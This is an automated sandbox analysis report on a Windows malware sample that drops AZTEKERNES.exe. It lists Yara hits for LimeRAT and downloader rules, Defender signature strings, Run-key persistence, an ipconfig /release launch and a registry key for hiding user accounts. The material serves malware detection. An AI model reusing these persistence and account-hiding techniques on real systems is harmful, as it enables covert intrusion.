Source: Yara match	File source: 38.3.MpSigStub.exe.138bccd231a.71.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.74.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bccd231a.165.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.168.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.167.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.74.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.72.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.166.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.167.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.72.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.168.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.166.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.73.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18308141829.00000138BCCD6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18341014844.00000138BCCD6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected MSILLoadEncryptedAssembly

Show sources

Source: Yara match	File source: 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Binary or sample is protected by dotNetProtector

Show sources

Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: PvLogiciels.dotNetProtector
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: <dotNetProtector>
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: !#HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: PvLogiciels.dotNetProtector.Runtime
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: <dotNetProtector>x
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000026.00000003.18318585819.00000138BE41B000.00000004.00000001.sdmp	String found in binary or memory: :#Lowfi:HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000026.00000003.18318585819.00000138BE41B000.00000004.00000001.sdmp	String found in binary or memory: :#Lowfi:HSTR:MSIL/PvLogiciels.dotNetProtector.AU5n
Source: MpSigStub.exe, 00000026.00000003.18318585819.00000138BE41B000.00000004.00000001.sdmp	String found in binary or memory: Y#PERSIST:HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000026.00000003.18318585819.00000138BE41B000.00000004.00000001.sdmp	String found in binary or memory: Y#PERSIST:HSTR:MSIL/PvLogiciels.dotNetProtector.AU6

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Source: mpavbase.vdm.38.dr	Static PE information: real checksum: 0x354a210 should be:
Source: AZTEKERNES.exe.1.dr	Static PE information: real checksum: 0x22529 should be: 0x22f38
Source: mpasbase.vdm.38.dr	Static PE information: real checksum: 0x329e303 should be:

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_00411684 push esi; retn 000Ch	5_2_00411BF9
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_00407A58 pushad ; ret	5_2_00407A93
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_0040980C push esp; iretd	5_2_00409980
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_00405E17 push edi; iretd	5_2_00405E18
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_004098A9 push esp; iretd	5_2_00409980
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_00404531 pushad ; ret	5_2_00404532
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5D74 push esi; iretd	5_2_022F63BC
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5A21 push esi; iretd	5_2_022F63BC
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F626A push esi; iretd	5_2_022F63BC
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F1656 push es; ret	5_2_022F1682
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F1F3B push cs; retf	5_2_022F1F43
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F63E9 push esi; iretd	5_2_022F63BC
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9842 push edi; ret	5_2_022F9844
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5486 push esi; iretd	5_2_022F63BC
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5480 push ebp; iretd	5_2_022F5484
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F112C push ebp; retf	5_2_022F1163
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F6134 push esi; iretd	5_2_022F63BC
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F11A4 push ebp; retf	5_2_022F1163
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F21B0 push cs; retf	5_2_022F21B9
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F61D1 push esi; iretd	5_2_022F63BC

Source: ConfigSecurityPolicy.exe.44.dr

Static PE information: 0x6D96FD94 [Thu Apr 6 05:31:00 2028 UTC]

Source: MpCmdRun.exe.44.dr	Static PE information: section name: .didat
Source: NisSrv.exe.44.dr	Static PE information: section name: .didat
Source: MpCmdRun.exe0.44.dr	Static PE information: section name: .didat
Source: MpClient.dll.44.dr	Static PE information: section name: .didat
Source: MpCommu.dll.44.dr	Static PE information: section name: .didat
Source: MpRtp.dll.44.dr	Static PE information: section name: .didat
Source: MpSvc.dll.44.dr	Static PE information: section name: .didat
Source: ProtectionManagement.dll.44.dr	Static PE information: section name: .didat
Source: MpClient.dll0.44.dr	Static PE information: section name: .didat

Source: initial sample

Static PE information: section name: .text entropy: 6.83637943712

Persistence and Installation Behavior:

Sample is not signed and drops a device driver

Show sources

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdBoot.sys	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdDevFlt.sys	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdFilter.sys	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdNisDrv.sys	Jump to behavior

Uses ipconfig to lookup or modify the Windows network settings

Show sources

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig.exe /release

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpasdlta.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpavdlta.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpasbase.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpavbase.vdm	Jump to dropped file

Boot Survival:

Yara detected LimeRAT

Show sources

Source: Yara match	File source: 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PERAMELINE			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PERAMELINE			Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B57CB0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,

45_2_00007FF7B57CB0C8

Hooking and other Techniques for Hiding and Protection:

May modify the system service descriptor table (often done to hook functions)

Show sources

Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp

Binary or memory string: KeServiceDescriptorTable

Contains functionality to hide user accounts

Show sources

Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: \microsoft\windows nt\currentversion\winlogon\specialaccounts\userlist
Source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp	String found in binary or memory: DOWS\CURRENTVERSION\INTERNET SETTINGS\\CertificateRevocationXHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\\CertificateRevocationSHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\USER AGENT\\SHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\USER AGENT\\DHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\\\DHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\\\LHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WindowsUpdate\Auto Update\\>HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\WHKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\SpecialAccounts\UserList\\>HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\JHKLM\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\JHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\@HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\LOADLHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\LOAD?HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\RUNKHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\RUN^HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\(1)\\DEBUGGERIHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\PACKAGEDAPPXDEBUG\(1)\\IHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\PACKAGEDAPPXDEBUG\(1)\\WHKCU\SOFTWARE\CLASSES\ACTIVATABLECLASSES\PACKAGE\(1)\DEBUGINFORMATION\(1)\\DEBUGPATHWHKLM\SOFTWARE\CLASSES\ACTIVATABLECLASSES\PACKAGE\(1)\DEBUGINFORMATION\(1)\\DEBUGPATHKHKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE\\DISABLESR+HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER\\/HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER\SVC\\>HKLM\Software\Microsoft\Windows Defender Security Center\\\-HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\\-HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\\2HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\\2HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\\6HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP\\6HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP\\GHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\DOWNLOAD\\CHECKEXESIGNATURESEHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\DESKTOP\GENERAL\\WALLPAPERDHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PHISHINGFILTER\\ENABLEDV8AHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS\\AHKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS\\HHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\\HHKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\\*

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
